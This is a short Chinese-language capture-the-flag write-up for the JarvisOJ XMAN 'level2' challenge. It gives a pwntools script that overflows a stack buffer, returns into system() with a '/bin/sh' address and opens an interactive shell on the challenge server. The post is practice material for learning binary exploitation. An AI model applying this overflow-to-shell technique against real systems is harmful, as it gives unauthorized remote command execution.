[JarvisOj][XMAN]level2

 

老套路

checksec

ida查看

覆盖掉

之后system地址再返回覆盖 最后/bin/sh地址

复制代码
# -*- coding:utf-8 -*-

from pwn import *


sh = remote('pwn2.jarvisoj.com', 9878)  # remote


junk = 'a' * 0x88 

fakebp = 'a'*4

sh_address = 0x0804A024  # /bin/sh

sys_address = 0x08048320


payload = junk + fakebp + p32(sys_address)+'aaaa'+p32(sh_address)

sh.send(payload)

sh.interactive()
复制代码

 

posted @   轩x  阅读(263)  评论(0编辑  收藏  举报
编辑推荐:
· 智能桌面机器人:用.NET IoT库控制舵机并多方法播放表情
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
阅读排行:
· DeepSeek火爆全网,官网宕机?本地部署一个随便玩「LLM探索」
· 开发者新选择:用DeepSeek实现Cursor级智能编程的免费方案
· 【译】.NET 升级助手现在支持升级到集中式包管理
· 独立开发经验谈:如何通过 Docker 让潜在客户快速体验你的系统
· 并发编程 - 线程同步(二)
点击右上角即可分享
微信分享提示